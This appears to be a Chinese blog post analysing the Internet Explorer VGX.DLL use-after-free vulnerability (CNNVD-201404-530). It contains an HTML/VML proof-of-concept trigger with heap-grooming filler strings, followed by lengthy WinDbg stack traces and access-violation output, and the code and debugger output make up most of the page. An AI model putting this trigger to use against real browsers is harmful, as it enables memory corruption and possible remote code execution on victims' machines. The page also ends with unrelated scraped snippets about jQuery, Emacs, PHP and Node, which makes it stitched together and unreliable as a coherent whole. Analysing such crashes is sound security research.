
[CNNVD]Microsoft Internet Explorer 释放后重用漏洞(CNNVD-201404-530)

Microsoft Internet Explorer(IE)是美国微软(Microsoft)公司开发的一款Web浏览器,是Windows操作系统附带的默认浏览器。

Microsoft IE 6至11版本的VGX.DLL文件中存在释放后重用漏洞。远程攻击者可利用该漏洞执行任意代码或造成拒绝服务(内存损坏)。


<html xmlns:v="urn:schemas-microsoft-com:vml">
v\:* { Behavior: url(#default#VML) }
<head id="l">
function trigger()
var r,t,e,i;
var o = document.getElementById("l");
r = document.createElement("i");
t = r;
r = document.getElementById("k").childNodes[0].appendChild(r) ;
r = t.appendChild(o) ;
e = r.offsetParent;
i.disabled = o;
catch (e) {}
function fun()
var g_arr = [];
var arrLen = 0x250;
var m_block; for (var i = 0; i < arrLen; ++i)
g_arr[i] = document.createElement('div');
var a = unescape("%uAAAA%uAAAA") ;
while (a.length < 0xd8)
a += unescape("%uBBBB%uBBBB") ;
m_block = a.substring(0, (0xd8 - 2) / 2);
catch (e) {}
for (var i = 0; i < (arrLen / 2); ++i)
g_arr[i].title = m_block ;
<v:group id="k" style="width:500pt;">
trigger() ;




:> kv
ChildEBP RetAddr Args to Child
041ee998 68318a98 087abfc0 6837ce50 mshtml!CMarkup::IsConnectedToPrimaryMarkup+0x6 (FPO: [,,])
041ee9b8 68319d57 06dfbf30 041ee9dc mshtml!CMarkup::OnCssChange+0x52
041ee9c8 6860a5b3 087abfc0 6837ce64 mshtml!CElement::OnCssChange+0x1e
041ee9dc 6836bfc6 8001004c 6837ce50 mshtml!CStyleElement::OnPropertyChange+0xfc
041eeabc 682e4bd1 6837ce64 ffffffff 087abfcc mshtml!NUMPROPPARAMS::SetNumberProperty+0x2d9
041eead8 682e4ba1 0000ffff 0a82efd8 041eeb10 mshtml!CBase::put_BoolHelper+0x25
041eeae8 682e24dd 087abfc0 0000ffff 068e8fd0 mshtml!CBase::put_Bool+0x22
041eeb10 683f235c 087abfc0 068e8fd0 0a82efd8 mshtml!GS_VARIANTBOOL+0x19b
041eeb84 683fc75a 087abfc0 8001004c mshtml!CBase::ContextInvokeEx+0x5dc
041eebd4 6820c29b 087abfc0 8001004c mshtml!CElement::ContextInvokeEx+0x9d
041eec00 683a3104 087abfc0 8001004c mshtml!CStyleElement::VersionedInvokeEx+0x62
041eec54 645aa22a 06e9afd8 8001004c mshtml!PlainInvokeEx+0xeb
041eec90 645aa175 0819cd10 8001004c jscript!IDispatchExInvokeEx2+0x104
041eeccc 645aa3f6 0819cd10 0000000c jscript!IDispatchExInvokeEx+0x6a
041eed8c 645aa4a0 8001004c 0000000c jscript!InvokeDispatchEx+0x98
041eedc0 645bd8c8 0819cd10 041eedf4 0000000c jscript!VAR::InvokeByName+0x139
041eee08 645a9c0e 0819cd10 0000000c jscript!VAR::InvokeDispName+0x7d
041eef9c 645b5c9d 041eefb4 01876f88 jscript!CScriptRuntime::Run+0x208d
041ef084 645b5bfb 01878fa0 jscript!ScrFncObj::CallWithFrameOnStack+0xce
041ef0cc 645b74ac 01878fa0 jscript!ScrFncObj::Call+0x8d


:> g
Breakpoint hit
eax=683720a8 ebx=06d96fe8 ecx=06fd1f30 edx=001f1078 esi=06fd1f30 edi=
eip=683e12b8 esp=0419b40c ebp=0419b414 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
683e12b8 8bff mov edi,edi
:> ? esi
Evaluate expression: = 06fd1f30
:> kv
ChildEBP RetAddr Args to Child
0419b408 683e1297 06fd1f30 0419b42c 68387dd0 mshtml!CMarkup::~CMarkup (FPO: [,,])
0419b414 68387dd0 68387db6 mshtml!CMarkup::`scalar deleting destructor'+0xd
0419b41c 68387db6 00000000 06fd1f30 0419b450 mshtml!CBase::SubRelease+0x22 (FPO: [0,0,0])
0419b42c 68319de5 06fd1f30 0540b680 6831a2d4 mshtml!CBase::PrivateRelease+0x3c
0419b438 6831a2d4 0a978fd8 0a97efd8 00001400 mshtml!CMarkup::ProcessPeerTask+0x47 (FPO: [0,1,0])
0419b450 683fc6ce 08a4af30 00000000 0a978fd8 mshtml!CMarkup::ProcessPeerTasks+0xf0
0419b468 683f1e59 0a97efd8 07873260 10000003 mshtml!CElement::VersionedGetDispID+0x52
0419b4ac 68a3a304 0a978fd8 07873260 10000003 mshtml!PlainGetDispID+0xdc
0419b4dc 68a3a272 07873260 0419b518 0a978fd8 jscript!IDispatchExGetDispID+0xa5
0419b4f4 68a3a47a 06e25d10 0419b518 00000003 jscript!GetDex2DispID+0x31
0419b520 68a4d8c8 06e25d10 0419b554 0000000c jscript!VAR::InvokeByName+0xee
0419b56c 68a39c0e 06e25d10 0000000c 00000000 jscript!VAR::InvokeDispName+0x7d
0419b700 68a45c9d 0419b718 0419b85c 06e5bf88 jscript!CScriptRuntime::Run+0x208d
0419b7e8 68a45bfb 0419b85c 00000000 06e57e80 jscript!ScrFncObj::CallWithFrameOnStack+0xce
0419b830 68a45e11 0419b85c 00000000 06e57e80 jscript!ScrFncObj::Call+0x8d
0419b8ac 68a3f3ee 06e5bf88 0419baf0 00000000 jscript!CSession::Execute+0x15f
0419b994 68a3ea2e 00000000 00000001 0419ba4c jscript!NameTbl::InvokeDef+0x1b5
0419ba18 68417af1 06e5bf88 00000000 00000804 jscript!NameTbl::InvokeEx+0x12c
0419ba68 68417b91 063d2fc8 06e5bf88 00000000 mshtml!CBase::InvokeDispatchWithThis+0x1e1
0419bb94 6838a932 80010013 8001179f 0a96cfd8 mshtml!CBase::InvokeEvent+0x214


    70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030
77247d96 ntdll!RtlpAllocateHeap+0x000000c4
772134ca ntdll!RtlAllocateHeap+0x0000023a
6830a8da mshtml!CDoc::CreateMarkupFromInfo+0x000000e2
6831625f mshtml!CDoc::CreateMarkup+0x0000004a
6826d0b1 mshtml!CCommentElement::`scalar deleting destructor'+0x000002d3
681ec57d mshtml!CElement::removeNode+0x00000046
681ec630 mshtml!Method_IDispatchpp_oDoVARIANTBOOL+0x000000cc
683f235c mshtml!CBase::ContextInvokeEx+0x000005dc
683fc75a mshtml!CElement::ContextInvokeEx+0x0000009d
683fc79a mshtml!CInput::VersionedInvokeEx+0x0000002d
683a3104 mshtml!PlainInvokeEx+0x000000eb
67eba22a jscript!IDispatchExInvokeEx2+0x00000104
67eba175 jscript!IDispatchExInvokeEx+0x0000006a
67eba3f6 jscript!InvokeDispatchEx+0x00000098
67eba4a0 jscript!VAR::InvokeByName+0x00000139
67ecd8c8 jscript!VAR::InvokeDispName+0x0000007d
67ecd96f jscript!VAR::InvokeByDispID+0x000000ce
67ece3e7 jscript!CScriptRuntime::Run+0x00002b80
67ec5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
67ec5bfb jscript!ScrFncObj::Call+0x0000008d
67ec5e11 jscript!CSession::Execute+0x0000015f
67ebf3ee jscript!NameTbl::InvokeDef+0x000001b5
67ebea2e jscript!NameTbl::InvokeEx+0x0000012c
68417af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
68417b91 mshtml!CBase::InvokeEvent+0x00000214
6838a932 mshtml!CBase::FireEvent+0x000000e1
683d4836 mshtml!CElement::FireEvent+0x000003c4
6840c550 mshtml!CElement::Fire_onpropertychange+0x0000005a
6840c4d7 mshtml!CElement::Fire_PropertyChangeHelper+0x00000121
6840c457 mshtml!CElement::OnPropertyChange+0x00000b7b



<html xmlns:v="urn:schemas-microsoft-com:vml">
v\:* { Behavior: url(#default#VML) }
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function trigger()
var r,t,e,i;
var o = document.getElementById("l");
r = document.createElement("i");
t = r;
r = document.getElementById("k").childNodes[0].appendChild(r) ;
r = t.appendChild(o) ;
e = r.offsetParent;
i.disabled = o;
catch (e) {}
function fun()
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g_arr[i] = document.createElement('div');
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while (a.length < 0xd8)
a += unescape("%uBBBB%uBBBB") ;
m_block = a.substring(0, (0xd8 - 2) / 2);
catch (e) {}
for (var i = 0; i < (arrLen / 2); ++i)
g_arr[i].title = m_block ;
<v:group id="k" style="width:500pt;">
trigger() ;
:> g
Breakpoint hit
eax= ebx=040ded00 ecx= edx= esi=040decf0 edi=040decf0
eip=688bd8c0 esp=040debf4 ebp=040dec30 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd8c0 ff2580108968 jmp dword ptr [jscript!_imp__tan ()] ds::={msvcrt!tan (758dde34)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd711 esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd711 ff2568108968 jmp dword ptr [jscript!_imp__sin ()] ds::={msvcrt!sin (758d8aea)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd67f esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd67f ff2590108968 jmp dword ptr [jscript!_imp__cos ()] ds::={msvcrt!cos (758d8ace)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd8c0 ff2580108968 jmp dword ptr [jscript!_imp__tan ()] ds::={msvcrt!tan (758dde34)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd711 esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd711 ff2568108968 jmp dword ptr [jscript!_imp__sin ()] ds::={msvcrt!sin (758d8aea)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd67f esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd67f ff2590108968 jmp dword ptr [jscript!_imp__cos ()] ds::={msvcrt!cos (758d8ace)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd8c0 ff2580108968 jmp dword ptr [jscript!_imp__tan ()] ds::={msvcrt!tan (758dde34)}
:> g
Breakpoint hit
eax= ebx=040ddae0 ecx= edx= esi=040ddad0 edi=040ddad0
eip=688bd67f esp=040dd9b4 ebp=040dd9f0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd67f ff2590108968 jmp dword ptr [jscript!_imp__cos ()] ds::={msvcrt!cos (758d8ace)}
:> g
Breakpoint hit
eax=040dd934 ebx= ecx= edx=6837c8f9 esi= edi=
eip= esp=040dd854 ebp=040dd938 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
8bff mov edi,edi
:> g
Breakpoint hit
eax= ebx=040ddae0 ecx= edx= esi=040ddad0 edi=040ddad0
eip=688bd8c0 esp=040dd9b4 ebp=040dd9f0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd8c0 ff2580108968 jmp dword ptr [jscript!_imp__tan ()] ds::={msvcrt!tan (758dde34)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd711 esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd711 ff2568108968 jmp dword ptr [jscript!_imp__sin ()] ds::={msvcrt!sin (758d8aea)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd67f esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd67f ff2590108968 jmp dword ptr [jscript!_imp__cos ()] ds::={msvcrt!cos (758d8ace)}
:> g
Breakpoint hit
eax= ebx=040de998 ecx= edx= esi=040de988 edi=040de988
eip=688bd8c0 esp=040de874 ebp=040de8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd8c0 ff2580108968 jmp dword ptr [jscript!_imp__tan ()] ds::={msvcrt!tan (758dde34)}
:> g
Breakpoint hit
eax= ebx=040db3a0 ecx= edx= esi=040db390 edi=040db390
eip=688bd67f esp=040db274 ebp=040db2b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd67f ff2590108968 jmp dword ptr [jscript!_imp__cos ()] ds::={msvcrt!cos (758d8ace)}
:> g
Breakpoint hit
eax=040db1f4 ebx= ecx=07b9ff30 edx=6837c8f9 esi= edi=
eip= esp=040db114 ebp=040db1f8 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
8bff mov edi,edi
:> g
Breakpoint hit
eax= ebx=040db3a0 ecx= edx= esi=040db390 edi=040db390
eip=688bd8c0 esp=040db274 ebp=040db2b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
688bd8c0 ff2580108968 jmp dword ptr [jscript!_imp__tan ()] ds::={msvcrt!tan (758dde34)}
:> g
(e68.): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07caff30 ebx=07caff30 ecx=a06dfdb5 edx= esi=07caff30 edi=0824efc0
eip=68318d1d esp=040de6ec ebp=040de710 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
68318d1d 8b465c mov eax,dword ptr [esi+5Ch] ds::07caff8c=????????






:> g
Breakpoint hit
eax= ebx=042bde78 ecx= edx= esi=042bde68 edi=042bde68
eip=67edd8c0 esp=042bdd74 ebp=042bddb0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
67edd8c0 ff258010eb67 jmp dword ptr [jscript!_imp__tan (67eb1080)] ds::67eb1080={msvcrt!tan (758dde34)}
:> bl
e 67edd8c0 () :**** jscript!tan
e 67edd67f () :**** jscript!cos
e 67edd711 () :**** jscript!sin
:> bu mshtml!CMarkup::~CMarkup
:> g
Breakpoint hit
eax= ebx=042bed30 ecx= edx= esi=042bed20 edi=042bed20
eip=67edd711 esp=042bec34 ebp=042bec70 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
67edd711 ff256810eb67 jmp dword ptr [jscript!_imp__sin (67eb1068)] ds::67eb1068={msvcrt!sin (758d8aea)}
:> g
Breakpoint hit
eax= ebx=042bed30 ecx= edx= esi=042bed20 edi=042bed20
eip=67edd67f esp=042bec34 ebp=042bec70 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
67edd67f ff259010eb67 jmp dword ptr [jscript!_imp__cos (67eb1090)] ds::67eb1090={msvcrt!cos (758d8ace)}
:> g
Breakpoint hit
eax= ebx=042bb738 ecx= edx= esi=042bb728 edi=042bb728
eip=67edd8c0 esp=042bb634 ebp=042bb670 iopl= nv up ei pl nz ac po nc
cs=001b ss= ds= es= fs=003b gs= efl=
67edd8c0 ff258010eb67 jmp dword ptr [jscript!_imp__tan (67eb1080)] ds::67eb1080={msvcrt!tan (758dde34)}
:> g
Breakpoint hit
eax=683720a8 ebx=0653efe8 ecx=07117f30 edx= esi=07117f30 edi=
eip=683e12b8 esp=042bb7a4 ebp=042bb7ac iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
683e12b8 8bff mov edi,edi
:> ? ecx
Evaluate expression: = 07117f30
:> g
(b74.e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07117f30 ebx=07117f30 ecx=9f3dcc40 edx= esi=07117f30 edi=08392fc0
eip=68318d1d esp=042bea84 ebp=042beaa8 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
68318d1d 8b465c mov eax,dword ptr [esi+5Ch] ds::07117f8c=????????





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    1,点击目标区域以外隐藏,运用场景:点击遮罩层,弹层关闭. // 点击目标区域以外隐藏 $(document).on("click", function (event) { var ...

  7. 如何定制Gtk版Emacs的Widget外观

    当我们使用 xlib 版的Emacs时,可以通过 XResource 定义 Emacs 的菜单 栏.工具条.滚动条的外观. 现在,在Linux上我们大多使用 gtk版的Emacs,是否还有办法定义 E ...

  8. HDU 1181 变形课 (深搜)

    题目连接 Problem Description 呃......变形课上Harry碰到了一点小麻烦,因为他并不像Hermione那样能够记住所有的咒语而随意的将一个棒球变成刺猬什么的,但是他发现了变形 ...

  9. php魔术函数 __clone()

    原文地址: http://www.nowamagic.net/librarys/posts/php/32 PHP4面向对象功能一个很大的缺点,是将对象视为另一种数据类型,这使得很多常见的OOP方法无法 ...

  10. Node程序debug小记

    有时候,所见并不是所得,有些包,你需要去翻他的源码才知道为什么会这样. 背景 今天调试一个程序,用到了一个很久之前的NPM包,名为formstream,用来将form表单数据转换为流的形式进行接口调用 ...